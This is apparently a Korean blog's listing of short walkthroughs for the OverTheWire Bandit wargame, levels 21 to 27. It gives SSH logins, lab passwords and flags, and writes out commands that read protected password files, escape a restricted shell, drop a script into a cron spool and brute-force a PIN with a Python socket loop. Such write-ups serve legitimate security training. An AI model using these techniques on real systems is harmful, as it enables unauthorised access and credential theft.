WarGame(229)
-
Bandit - level26→ level27
level26→ level27 ssh bandit26@bandit.labs.overthewire.org -p 2220 pw : 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z 인데 쉘 떄문에 안들어가짐 ssh bandit25@bandit.labs.overthewire.org -p 2220 pw : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG ssh -i ./bandit26.sshkey bandi26@127.0.0.1 v :shell ./bandit27-do cat /etc/bandit_pass/bandit27 FLAG : 3ba3118a22e93127a4ed485be72ef5ea
2021.06.09 -
Bandit - level25 → level26
level25 → level26 ssh bandit25@bandit.labs.overthewire.org -p 2220 pw : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG ssh -i ./bandit26.sshkey bandi26@127.0.0.1 일단 동작하는 쉘이 다르다. 쉘을 무언가를 읽는 동작을 수행하고 해당 파일을 찾아보면 해당 위치에 있다. 이 파일을 읽어보면 권한 오류가 뜬다. more 함수는 창의 크기에 맞게 따오기 떄문에 v —> : r /etc/bandit_pass/bandit26 명령어를 통해서 more로 불러오는 중에 파일을 import해서 읽어오면된다. 문제가 신박하다 FLAG : 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
2021.06.08 -
Bandit - level24 → level25
level24 → level25 ssh bandit24@bandit.labs.overthewire.org -p 2220 pw : UoMYTrfrBFHyQXmg6gzctqAwOmw1Ioh mkdir /tmp/brute cd /tmp/brute vi ex.py # coding: utf-8 import sys import socket pw = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" s = socket.socket(socket.AF\_INET, socket.SOCK\_STREAM) s.connect(("127.0.0.1", 30002)) s.recv(1024) for i in range(0, 10000) : msg=str(pw)+" "+str(i)+"\\n" s.sendall(msg.en..
2021.06.07 -
Bandit - level23 → level24
level23 → level24 ssh bandit23@bandit.labs.overthewire.org -p 2220 pw : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n cat /etc/cron.d/cronjob_bandit24 cat /usr/bin/cronjob_bandit24.sh mkdir /tmp/m0nd2y1 cd /tmp/m0nd2y1 vi script.sh #!/bin/sh cat /etc/bandit_pass/bandit24 > /tmp/m0nd2y1/flag chmod 777 script.sh chmod 777 /tmp/m0nd2y1 cp script.sh /var/spool/bandit24/ FLAG : UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
2021.05.30 -
Bandit - level22 → level23
level22 → level23 ssh bandit22@bandit.labs.overthewire.org -p 2220 pw : Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI cat /etc/cron.d/cronjob_bandit23 cat /usr/bin/cronjob_bandit23.sh echo I am user bandit23 | md5sum | cut -d ' ' -f 1 cat /tmp/8ca319486bfbbc3663ea0fbe81326349 FLAG: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
2021.05.28 -
Bandit - level21 → level22
level21 → level22 ssh bandit21@bandit.labs.overthewire.org -p 2220 pw : gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr cd /etc/cron.d cat cronjob_bandit22 cat /usr/bin/cronjob_bandit22.sh cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv FLAG : Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
2021.05.27